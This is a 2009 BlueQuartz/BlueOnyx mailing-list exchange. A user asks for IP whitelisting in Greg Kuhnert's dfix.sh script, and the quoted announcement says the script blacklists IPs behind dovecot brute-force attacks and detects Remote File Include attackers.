Greg, would be great if you could add to your script the ability to
whitelist a set of IP addresses. For instance I had to customize your script
to get it to ignore a monitoring server.
Jim
----- Original Message -----
From: "Greg Kuhnert" <greg.kuhnert (at mark) theanchoragesylvania.com>
To: "BQ List" <coba-e (at mark) bluequartz.org>; "BlueOnyx General Mailing List"
<blueonyx (at mark) blueonyx.it>
Sent: Monday, January 19, 2009 3:52 AM
Subject: [coba-e:14799] dfix.sh Update
> Hi Blue*
>
> After the recent dovecot update, I noticed a log format change to the
> dovecot log files. Theoretically, the reason for running dfix is now gone.
> The old system lockups when our servers are subjected to brute force
> attacks to dovecot appear to be fixed with the current dovecot rpm.
>
> However, preventing system lockups is not the only reason to run dfix.
> Brute force attacks are designed to find bad or weak passwords. dfix will
> detect these attacks and temporarily black-list the attacker's IP address.
>
> Another new feature in the current version is the ability to detect http
> rfi (Remote File Include) attackers. If you upgrade to this version of
> dfix, you may be surprised just how many people are attempting to attack
> your websites.
>
> An explanation of RFI exploits can be found at
> http://en.wikipedia.org/wiki/Remote_File_Inclusion
>
> Anyway, the code for dfix is as always available at
> http://www.gregkuhnert.com/public:bq:dfix
>
> I plan to release another update soon - to cleanup the code.... till then,
> enjoy this version.
>
> Regards,
> Greg.
>